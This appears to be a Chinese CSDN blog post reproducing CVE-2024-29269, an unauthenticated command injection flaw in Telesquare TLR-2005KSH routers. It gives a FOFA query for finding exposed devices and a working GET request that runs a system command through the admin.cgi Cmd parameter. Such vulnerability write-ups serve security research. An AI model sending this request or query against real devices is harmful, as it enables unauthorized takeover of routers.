【漏洞复现】Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)

最新推荐文章于 2024-05-16 16:03:07 发布
最新推荐文章于 2024-05-16 16:03:07 发布
阅读量428 收藏
点赞数 11
分类专栏: 漏洞复现 文章标签: 开发语言 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137471070
版权

0x01 产品简介

Telesquare TLR-2005KSH是韩国Telesquare公司的一款路由器。

0x02 漏洞概述

Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。

0x03 测绘语句

fofa: title="Login to TLR-2005KSH"

0x04 漏洞复现

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1

0x05 影响范围

Telesquare TLR-2005Ksh版本1.0.0和1.1.4

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

从不学安全
关注
  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)
0xSec
04-07 633
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 354
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
复现CVE-2024-29269 某国外路由器RCE漏洞_72
fushuang333的博客
04-12 476
复现CVE-2024-29269 某国外路由器RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁
04-09
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁,Windows6.1-KB3042553-x64.msu ,适用于Windows Server 2008 R2 x64 ,亲测可用。
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
CVE-2024-29269Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 150
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器。Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)
weixin_52204925的博客
03-07 717
网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
漏洞复现Telesquare TLR-2005Ksh 路由器 RCE漏洞
weixin_52204925的博客
03-19 497
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
weixin_43567873的博客
04-08 143
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
PHP-CGI远程代码执行漏洞CVE-2012-1823)
orchid_sea的博客
07-19 2545
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
Jenkins 远程代码执行漏洞CVE-2017-1000353) 复现
YouthBelief的博客
11-25 4734
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353)Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
Samba 远程命令执行漏洞CVE-2017-7494)
07-29 4117
Samba 远程命令执行漏洞CVE-2017-7494)
SB2B2C商城系统如何挑选?开发语言、功能模块、商城优势分析
最新发布
weixin_42958899的博客
05-16 365
为满足不断增长的市场需求,SB2B2C商城模式应运而生,以此将供应商、企业客户、消费者紧紧连接在一个平台上,从而为各方提供便利和增加商业价值。上述开发语言拥有各自的特性,考虑到商城软件的特殊性,所以现在90%企业都是采用java语言来搭建商城平台,因为java语言安全、稳定性方面非常突出,在一定程度上更适合企业应用到电商项目上来。一种动态脚本语言,具有丰富的语法特性和灵活的语言结构,因为php语言简单易学,许多人在网上通过下载教程进行学习,这也造成函数命名不规范等问题。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 331
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值